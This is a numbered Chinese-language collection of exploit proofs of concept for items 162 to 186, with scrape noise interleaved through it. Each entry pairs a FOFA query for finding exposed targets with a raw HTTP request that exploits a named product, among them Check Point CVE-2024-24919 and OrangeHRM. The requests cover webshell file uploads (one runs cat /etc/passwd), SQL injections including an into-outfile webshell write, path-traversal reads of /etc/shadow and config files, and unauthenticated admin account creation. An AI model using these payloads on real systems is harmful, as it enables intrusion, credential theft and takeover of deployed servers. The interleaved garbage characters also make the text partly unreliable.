4 L. T7 @1 E! l) Y6 m( Thttp://x.x.x.x/dizxdell.aspx. u% [ c( `! q$ Y$ z$ b
% V% K. {7 ^5 z2 E% ^
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 b, l4 i0 h. Z l1 ]* @; G
FOFA: app="和丰山海-数字标牌"
- q5 b& L6 @5 u+ \$ v& zPOST /QH.aspx HTTP/1.16 u7 p% Q0 o% A- z
Host: x.x.x.x; b, L+ w% N! m5 h- y7 r+ u2 C, P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
9 \6 {! w5 f6 ^4 @Connection: close H6 ]% X& B ]. c
Content-Length: 583$ d, p @* Z' O; |" U' L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey4 H" M+ T; @% m
Accept-Encoding: gzip
0 @+ |8 z' @3 r# V* R4 M: r' k
. I, [0 S8 ]) b% c# }------WebKitFormBoundaryeegvclmyurlotuey( R3 g5 T- S) A* [ J; K
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"5 T% f2 ]2 S2 |* t. B
Content-Type: application/octet-stream4 }0 m7 F9 u4 q) T8 j# F
- y3 B9 ^' q3 m. J
<% response.write("ujidwqfuuqjalgkvrpqy") %>4 ~3 r4 D' Q5 A) L3 F, V; N! P
------WebKitFormBoundaryeegvclmyurlotuey1 G8 @# w, @3 [
Content-Disposition: form-data; name="action"( S5 g/ N% e. N1 d
4 T) X7 |+ }) M! L1 W& y0 U& p
upload( p; s/ g: L3 |
------WebKitFormBoundaryeegvclmyurlotuey
4 |, d! C3 Y, S, ^: b( q" RContent-Disposition: form-data; name="responderId"9 V( R4 R$ ?. A$ R/ r& P9 I
* y- S P. m; u
ResourceNewResponder
" s( B$ `% }* e/ C------WebKitFormBoundaryeegvclmyurlotuey m3 E+ e8 O! w* k1 ~
Content-Disposition: form-data; name="remotePath"( R+ D6 C- Z0 T
" d, `! b+ g( Y) q* z/opt/resources1 R% E9 Q0 {: W1 z
------WebKitFormBoundaryeegvclmyurlotuey--
S5 A. l6 T' {6 m6 \. Q( c& e- N
$ w% p6 I/ B' K6 X) w. Q z; N$ p4 h9 ?% }& Y" c: b0 l/ C2 X) U
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
7 m/ x2 {" ?# c; i1 u5 g
% t' W. S3 J, r7 o2 q163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
+ p4 y5 P; |/ e5 I# Y, ]8 I1 l! VFOFA: icon_hash="-795291075"' W4 C6 L( I% V7 r
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1" `, h0 p, n+ a8 \3 M, u
Host: x.x.x.x
. i# V8 j- b5 B$ d! s9 z! TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
v4 U j Z& Q' i p" J# YConnection: close
: m: E$ Y2 _' Y& N( IContent-Length: 293
3 s# F% D2 i1 s' a4 f7 e d9 ]' lAccept: */*2 Z% T9 O9 S7 @3 n# ~& `0 a
Accept-Encoding: gzip, deflate
! r' M: Q5 S; A g4 C& qAccept-Language: zh-CN,zh;q=0.9
' t7 f; ]4 N/ ?$ J' ~Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod3 _: b% g; ^: v ^- T
/ f; P9 ]7 D0 u2 Q
------iiqvnofupvhdyrcoqyuujyetjvqgocod
& T8 T( e3 [1 |2 I0 a7 p4 f6 F4 ZContent-Disposition: form-data; name="name"
. z" S0 d1 X1 _2 y$ V% M( C
7 k. O+ H. j: } z( a( |1.php0 n6 l& ^3 _5 H; p. J' y* p
------iiqvnofupvhdyrcoqyuujyetjvqgocod" Z3 j) w1 M% l* r$ }, G2 o8 z6 `
Content-Disposition: form-data; name="upfile"; filename="1.php"' }2 b4 s- ?% M4 @7 N
Content-Type: image/jpeg% v& C& Z( Z9 G; ]
@0 G- _6 T6 O2 G7 N
rvjhvbhwwuooyiioxega9 O% e: [* x$ d. L
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
: ]% ?! K$ [1 t: e$ u3 k8 n; t; P* e5 ?" w' Q1 |' H
& B$ Y. d; m3 I( v9 w164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
+ C. K6 P+ U }9 W ~/ eFOFA: title="智慧综合管理平台登入"
3 i) B$ S9 h% V$ ePOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1! A! V u4 r K7 ^: u
Host: x.x.x.x/ T% r) }3 l! H) k, ^- }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- v/ @* G, I0 |: _' z9 S) FContent-Length: 288
( o, Z" h* ^' e4 cAccept: application/json, text/javascript, */*; q=0.01
+ u; `5 C% v4 ^" z( u; F0 UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,, t/ L9 e$ U7 H+ a
Connection: close7 l N( A( h- L) p; v5 y1 B6 Z5 W
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl1 V2 t5 B% c7 f
X-Requested-With: XMLHttpRequest/ w# q( y% h- a g
Accept-Encoding: gzip
% [' h8 \( \/ N+ o! k, ?! l5 d( _) H/ W& s
------dqdaieopnozbkapjacdbdthlvtlyl" M" g0 ?+ e, X6 D
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"/ o2 N+ ?) X; O3 J I9 E
Content-Type: image/jpeg- {. O( J( Y' X2 s) j2 R9 l
6 `% P/ A% d/ F3 b7 l' q
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
! n; F: ~$ }! |: D/ `/ W4 T; l------dqdaieopnozbkapjacdbdthlvtlyl--
; J# M6 B' {' h+ O0 C) X7 M, y( N, R. l5 z6 V
4 z H% c8 e H! C' k3 r+ l$ X4 y
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
/ J) R/ M& g9 x/ N
7 w$ |" N6 `, Z! ]2 {: d' e165. OrangeHRM 3.3.3 SQL 注入
! G: D4 `- T2 ~CVE-2024-36428
# R9 ^ t. S0 |% O, O- g+ mFOFA: app="OrangeHRM-产品"4 v5 L% H* r# F; Q
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
8 b% ^7 v# b8 f: X3 H3 _% t
! c* C' S% C0 L9 P* j7 E t- }# g& H$ ^5 ~- M4 H
166. 中成科信票务管理平台SeatMapHandler SQL注入
' d; v S' i C- X( PFOFA:body="技术支持:北京中成科信科技发展有限公司"
; y( T% c3 \7 d; xPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
( E7 v2 U! s! S6 WHost:( B8 j# x% ?3 S& Y
Pragma: no-cache
u2 N) K: g& w/ u$ W5 nCache-Control: no-cache
5 l& o3 z' S& l# N* c MUpgrade-Insecure-Requests: 1, U: y7 Z/ b2 M2 b5 Y' T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
. H `! x. B4 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7! n& e+ D6 m) `8 L" m) d ]! T
Accept-Encoding: gzip, deflate& O$ P$ R; f; {$ S9 r% m+ _
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
0 k8 n* ]6 P0 E: _Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
c {7 B2 N1 U' aConnection: close1 f1 }9 `. j0 \: Y* S
Content-Type: application/x-www-form-urlencoded
6 v9 N# w) O) N" t0 F, s4 AContent-Length: 89
: J9 y. a z! |/ v
, b6 n5 z- X6 }, }! K0 |! _Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
- q6 f7 _9 r' w* g; y a! e; p9 _# L$ Z$ v4 C8 d; a% J; x! I
4 u. G% r) q: H167. 精益价值管理系统 DownLoad.aspx任意文件读取
% r+ U/ v8 y6 x' m# A; H0 U$ aFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"& d: s+ x, C6 F! C
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
! h( a/ d. H, U2 x& K! L* F1 r) mHost:" I' K6 x& V1 Y! B6 M( q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 U7 K* x* t) V6 f+ C: oContent-Type: application/x-www-form-urlencoded
& |/ _5 {5 [" @5 U; t G/ cAccept-Encoding: gzip, deflate5 u) Q8 z* W' q; ]+ A8 x
Accept: */*
. d. y+ F5 j2 y' }( jConnection: keep-alive
6 E* K8 D5 x$ P0 I. D1 E5 F$ }9 ~2 Z% x! V- p# @' y: g* B/ d
: ~) j; S r* A8 k: L
168. 宏景EHR OutputCode 任意文件读取
{+ P) b1 M; K9 Z7 TFOFA:app="HJSOFT-HCM"" J) g0 i) _% f6 d" P+ O3 w
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1; A2 Y: |5 M+ u. C
Host: your-ip
4 k6 q- h6 T2 r. E- ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+ |! u, i# r3 \6 fContent-Type: application/x-www-form-urlencoded
9 n V9 O! B/ u& u% JConnection: close$ w# O4 ?1 m$ E+ w
) _+ S- T! I; _% C
1 R6 E% ^8 f L/ ?
' {% U* @1 ^; e' G, `7 k) a
169. 宏景EHR downlawbase SQL注入
- Q0 y2 K/ b# v0 e8 kFOFA:app="HJSOFT-HCM"" b7 {) f& W+ R2 a# _
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1* c; g0 u7 t5 g( c0 z
Host: your-ip
5 g. f: g6 S& ?, m6 F" N; N& p) y5 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# s" O! o$ Y3 Y% B7 q
Accept: */*, j; l ~- m: d6 w% _
Accept-Encoding: gzip, deflate& m0 G& [+ E" y. q$ e8 W
Connection: close2 b9 i8 Q4 U2 j1 @( ]5 {; p
3 R! z; z6 [4 `5 K6 q; d# N/ v A/ D7 Q. e: V3 N
2 N( s& t8 f/ P" s3 F170. 宏景EHR DisplayExcelCustomReport 任意文件读取; J% G: @' c# j) x
FOFA:body="/general/sys/hjaxmanage.js"9 f& Y4 j% L0 d7 J, z
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
1 d1 a9 Y& [* V# I. _( MHost: balalanengliang
' _" o' [+ M/ ?$ g/ E! aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" ]' l% h- W5 e
Content-Type: application/x-www-form-urlencoded
! M4 [& [7 ?- u K% R% L* C! S5 C, n2 p3 {
filename=../webapps/ROOT/WEB-INF/web.xml3 u0 M! I& a+ ?1 k, |6 v
+ G6 w/ V% l1 x; J3 y' B# ~4 |
r& [) t! l3 l( i: P% W' g3 ?; ^% d+ z171. 通天星CMSV6车载定位监控平台 SQL注入! {/ ? o# J0 d* K3 h3 [3 @3 g% C
FOFA:body="/808gps/"
1 Y& ]$ C, p# @: s( \$ pGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1! L; h6 v- U' s2 k
Host: your-ip9 |" A: X3 i3 R+ ~% H& N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! h2 Y% z; T0 `4 w4 Z
Accept: */* ^, N' U- ]/ ?5 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ _" d# f, B; D4 V) a1 t2 d
Accept-Encoding: gzip, deflate7 Y( R, Y! J+ V
Connection: close$ c# P7 n4 _2 x# F1 j
) q( g% g p1 O# u
2 i/ x( k( V: U% w4 d# h2 C6 s
9 o5 W3 l* k3 P- ?: ]* c+ y
172. DT-高清车牌识别摄像机任意文件读取, H6 X; x. M9 `( F* I) y
FOFA:app="DT-高清车牌识别摄像机"; K8 U9 ^0 p* D# e
GET /../../../../etc/passwd HTTP/1.1
+ h7 W( b# o: b" S' A4 uHost: your-ip
2 y' s! h9 ?$ O3 T: V" y! aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 Y8 F4 a/ S# X5 v3 DAccept-Encoding: gzip, deflate4 s8 t2 r8 h/ L% W2 y& F
Accept: */*
; ^) Z! x+ ?& A1 ^1 pConnection: keep-alive5 O7 L* F& u6 r, X* y# n" K
8 i3 {, a5 b7 l; D: A; `
4 q$ K5 n( t8 |% X- W7 g3 P ]* G0 h
1 _- \( f2 H- r. V7 P! U173. Check Point 安全网关任意文件读取
3 E9 z6 O: N& k, y4 A; l7 bCVE-2024-24919
: h5 u8 k( H+ EFOFA:app="Check_Point-SSL-Network-Extender"
! x! K% G6 I% n" a3 l/ T3 NPOST /clients/MyCRL HTTP/1.1
3 Y d, c' m; M0 N+ M) }Host: your-ip
& E7 c" s5 E- L1 ?3 b- SContent-Type: application/x-www-form-urlencoded: r5 I* v8 G& j! n$ |1 _
) n& i1 i" M _ U+ o; s1 h5 w
aCSHELL/../../../../../../../etc/shadow
3 O% X2 y# g5 K9 `) ?& ~! H" @
* \4 x9 T Z0 h2 r% t2 B% I- p; n; n$ x
$ Q' F9 x$ q+ k$ }5 V8 {0 d$ ~174. 金和OA C6 FileDownLoad.aspx 任意文件读取$ t* J3 Y: W% A5 b3 n z8 o G
FOFA:app="金和网络-金和OA"
/ D8 t& X( g5 `GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* o2 f, w' { E! S" y# b
Host: your-ip
% r, d* J/ J; a" tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; p. e! M4 C$ K1 X) G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 b7 ^5 J; H! p8 w: O: N7 \3 H! UAccept-Encoding: gzip, deflate, br
* P0 n2 }: |( l& z5 |2 VAccept-Language: zh-CN,zh;q=0.94 V8 v+ s. k+ e" T( `% m9 J1 V
Connection: close
" T6 l0 K4 q8 s8 w1 z6 @- Q
9 r# k8 E4 Z1 u$ e4 h ^
2 ~" J8 c0 U4 \
) O7 p; G6 B. g175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入: |! v/ X Y' M k% \
FOFA:app="金和网络-金和OA"! k$ }! L! o3 k+ s) q# M7 v
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
1 n6 n1 _' s6 O8 jHost:
" _2 T. p7 B/ b0 f1 {% p( K' SUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% n) g2 @, W* T4 `2 _7 |& \" YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* @7 P* [/ F7 y8 ~, U* B) GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! E1 i4 ~$ i/ p- h+ k
Accept-Encoding: gzip, deflate& u) W l' W l" U" d) U, b
Connection: close. g2 G; n: o$ f0 ~6 i+ z
Upgrade-Insecure-Requests: 1
$ h6 v; Z' k: B" U" J5 A( _- V) `7 N0 o" ?
" w; e8 e$ J8 }9 F5 _; ^
176. 电信网关配置管理系统 rewrite.php 文件上传
9 D4 m r+ }* d) GFOFA:body="img/login_bg3.png" && body="系统登录"
& Q7 g# O3 A3 t! fPOST /manager/teletext/material/rewrite.php HTTP/1.1
1 r" g1 R1 g! |Host: your-ip
+ c2 F3 }' q8 G" R8 r bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0+ f5 I3 j2 x) @; {
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT9 S0 [2 d3 y' V9 Z7 q$ n
Connection: close
% }! @% g: \. d8 Y; Y6 H
& G( @) G% O3 N# F9 ~" C$ h! O------WebKitFormBoundaryOKldnDPT
! x* k: m9 o$ k& Z3 lContent-Disposition: form-data; name="tmp_name"; filename="test.php"0 k( J" Y5 y9 o% X: B9 k
Content-Type: image/png
$ d5 X3 {3 A2 x! ^
3 W# X b5 n; A5 Q- ?5 x% F<?php system("cat /etc/passwd");unlink(__FILE__);?>
' }8 A4 W7 |; N( W, S9 j------WebKitFormBoundaryOKldnDPT' \. Y2 e& I* {
Content-Disposition: form-data; name="uploadtime"
1 \' R* x( Q. \1 _ 5 V3 R7 @: o: ` z- Z" G/ X c- M0 ^9 G
$ j2 Z. L6 D/ Y B------WebKitFormBoundaryOKldnDPT--4 I; M4 A" }& b7 `& a; `6 B( c
1 U* V! k: O' O6 \( F3 Z, D0 t9 g1 J/ ]
; [2 a: K6 V9 r$ C* o
177. H3C路由器敏感信息泄露
7 J8 [* ^8 ]7 [' f. I: Y) a3 D Z/ a5 \/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
# u5 v& K. w4 Z3 [! k/userLogin.asp/../actionpolicy_status/../M60.cfg
4 n, s+ M. v2 B: S/userLogin.asp/../actionpolicy_status/../GR8300.cfg
# W* n3 ?; j; A3 L; W; T$ t% E/userLogin.asp/../actionpolicy_status/../GR5200.cfg( u/ @& R) [4 }! P0 i9 e7 C# i
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
$ F; E# ^' z7 s% H; _9 Q* O" d* E/userLogin.asp/../actionpolicy_status/../GR2200.cfg$ _7 v$ p5 U- S* e }
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg- d% O, O8 x4 \& {( d
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg( a2 Q- {5 F2 ^5 {
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
7 Q; L" o) _4 h1 H+ a/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
, J% T$ {& z: y, W( V8 E/userLogin.asp/../actionpolicy_status/../ER5200.cfg
1 J& h5 I1 B3 U" b) c i/userLogin.asp/../actionpolicy_status/../ER5100.cfg. l! Q4 T- l' n2 I/ e; b1 n" a
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg4 ?# @. ~/ `) F$ n2 M& U
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
$ n' E7 u, U/ O4 |/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
$ z" x! q3 J4 g7 |/ m/userLogin.asp/../actionpolicy_status/../ER3200.cfg
( d1 F% h* e2 Y1 F4 T/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg+ C& v' v$ s6 Z6 t' T) h9 A
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg3 }- Y# e1 z9 O+ M8 Y! \$ ]0 C
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg, P. G2 C7 H! x& \3 f$ t
/userLogin.asp/../actionpolicy_status/../ER3100.cfg$ y7 C8 ~! E! R
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg5 Q0 y' v# h6 Z% o
! o+ Z/ E1 D3 V9 n$ Q2 z, z
- E# D* s( Z: F _ c
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
8 t; d% X- g2 ~" D! D! hFOFA:header="/selfservice"# ^. c6 ^$ t' g3 w6 j
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1* F2 m9 w6 a0 O# {0 _# i I
Host:; j2 S& A8 k4 K. u+ y4 G- S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 q, y# Q+ H, b$ I6 f# S; `4 {# q4 X
Content-Length: 252( _2 m% y6 @: s6 d5 v2 V
Accept-Encoding: gzip, deflate c. N0 i1 x, [+ t5 B+ a/ Y
Connection: close
: j1 X, o! \7 I# `3 |7 uContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
' v& P) T& v, `! d) ~. Y6 O-----------------aqutkea7vvanpqy3rh2l
3 E( @: O% \/ E! i! K6 \9 O" hContent-Disposition: form-data; name="12234.txt"; filename="12234"
4 Q7 \( ?/ z1 `' j% }Content-Type: application/octet-stream, j4 J. ?. j" M: f( y8 ^' ?
Content-Length: 255
! X. X' O* c- |( X7 u! w8 m$ Y: g8 ~6 e
12234" v- {- u! ^" h: r% V1 M
-----------------aqutkea7vvanpqy3rh2l--" [0 z7 `: U A! n, e! a; M& N
: R" }( }1 B8 B# U" _+ ?
6 _5 h$ s* T" b, A0 ~. L2 V
GET /imc/primepush/%2e%2e/flex/12234.txt
5 w$ t; S3 s; I) k, j4 d7 i1 B% n" K3 U; K
1 J% \, j z( T6 T/ M
179. 建文工程管理系统存在任意文件读取) N1 k/ s; j7 h! ^& L
POST /Common/DownLoad2.aspx HTTP/1.1# v6 O7 B; C* R& u& y
Host: {{Hostname}}7 v6 t! _2 D6 R q, B# z _9 T# d. x2 Y7 @
Content-Type: application/x-www-form-urlencoded
0 i+ N8 G$ K2 m1 J7 QUser-Agent: Mozilla/5.0
/ N, X9 u( d4 G$ o4 v2 ~
5 d! r+ v1 P1 w- Opath=../log4net.config&Name=
( m' o' Y' M. o2 X, v _ ?6 G! V# n1 e8 ^* f. G4 y$ L
/ j/ t$ N* s3 A X180. 帮管客 CRM jiliyu SQL注入
9 U3 w1 S5 n1 ~) B( X6 ~# _FOFA:app="帮管客-CRM"& N. a' t; X7 H% T! R( z j, F" U: _
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
' x' l4 {4 {0 g! q' {Host: your-ip
; ]5 }6 v4 H/ j8 |4 D) iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" y/ A3 C0 P$ x( EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: r: G, Y0 B, q& r- T/ m9 Y6 q5 v: X
Accept-Encoding: gzip, deflate
) [% g1 |5 U. M* [. qAccept-Language: zh-CN,zh;q=0.98 F0 P' Q8 z/ q9 }
Connection: close# M9 T. ~1 g6 S M4 V
' z. \2 d$ F* N& e0 C* }9 Q, x
) e" ?3 W! C% K
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
6 ^( A4 x# t6 L) Q/ mFOFA:"PDCA/js/_publicCom.js" O. X- G5 Q; \
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
1 Y# O" X; b( S4 {1 pHost: your-ip
( H9 k- ]/ C2 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36' w3 h# ~/ o/ {6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ J# Q: C; p& s7 _/ a9 lAccept-Encoding: gzip, deflate, br
7 ~+ y7 W% N$ JAccept-Language: zh-CN,zh;q=0.9/ u" ~5 U; V6 F% r) N y
Connection: close+ e! f) ?6 f* @3 a
Content-Type: application/x-www-form-urlencoded
+ ^2 Q2 L$ J8 K" U# A; ^: M! U% x% e s) G+ f
' @* ^% T/ o, v- S% v
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
$ c+ c7 c- k. {5 l! y
. V, L0 s6 b' O% X2 v8 S9 |) V1 R3 X# H' o0 p5 z. u8 A% e7 q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建$ l* C" i$ C" }+ \9 }2 V
FOFA:"PDCA/js/_publicCom.js"
& V2 @* _& C! b! O; l! fPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1; I J1 ` K4 P2 L
Host: your-ip Y0 @5 a9 H- \3 ~% f, W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 w3 m' {. h. M" GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 K& K5 u A1 p' L& sAccept-Encoding: gzip, deflate, br
2 N: g7 u$ c6 Y0 ^, NAccept-Language: zh-CN,zh;q=0.93 L3 F- [9 s$ @7 \: ?/ ]( K
Connection: close! y1 ?3 G3 w- L4 h' P
Content-Type: application/x-www-form-urlencoded
' C& p( Q4 e9 N8 g( e Y; O8 H) Y; e7 t1 d$ Y9 {6 y" Y
0 s3 D6 R1 ~) j1 Z1 I5 _username=test1234&pwd=test1234&savedays=1
8 F( L% Y: W/ t0 r ]/ B
& y3 d( Y6 q! V# O. j& P+ i! O$ U7 V+ V
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入+ d" z: {, a: M9 B. j7 T7 \
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
& n9 b2 M! O% f- Z& mGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.14 z/ \" t0 ~! b) J. N8 R$ @
Host: your-ip
/ k! C5 q1 S9 k4 I; L. jUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.365 g; ^2 u/ ]' @) P! D) x
Accept-Charset: utf-8( v6 c, x% g3 s2 e1 K1 A
Accept-Encoding: gzip, deflate
9 I$ A8 Y9 s3 m5 R: a: w: ~Connection: close* Y0 f4 {) h6 K1 y5 j7 [: K. q) w6 _
$ [$ ?3 d+ X- ?# L+ |& J9 Z
) a, Y4 ?" m0 a, p184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 a- q: N3 n0 K
FOFA:server="SunFull-Webs"
F. G: m/ x& @* X: g" U+ pPOST /soap/AddUser HTTP/1.1; T3 m; e& S( A7 M5 G
Host: your-ip
4 N6 j4 F2 _* ^" iAccept-Encoding: gzip, deflate5 [$ M" v+ G& j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: ]: X; l$ _- J: m! KAccept: application/xml, text/xml, */*; q=0.01- N) V% u' C3 A, |, ?
Content-Type: text/xml; charset=utf-8# ~2 b! P# N- |3 G, S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( a( e0 w1 O( q8 r8 d- m+ S r
X-Requested-With: XMLHttpRequest
8 s3 ]2 _- P8 S* }
1 r* z2 @, G* c, {5 u, T* o8 ?; d, E t& B+ x
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')# N2 b, [$ {1 I/ }4 L3 T7 g- j- z+ {
. L$ m; K0 c1 H- r% K! h, U0 w. U( c
185. 瑞友天翼应用虚拟化系统SQL注入
8 M* Z5 G' w) ~: M; vversion < 7.0.5.1+ z+ K5 P. k- Q1 ]/ L
FOFA:app="REALOR-天翼应用虚拟化系统"
4 I( s9 y7 [- v3 k, A- W" A) @8 _, tGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
: M3 A2 v% L$ ] tHost: host
! h% b; M: O' t: u8 O* y) v- o# e7 W# Y! a! s
3 H) y. K7 U3 g3 \* y' Q6 a$ U186. F-logic DataCube3 SQL注入4 \5 S3 N) L+ _4 ]# s7 ]
CVE-2024-31750
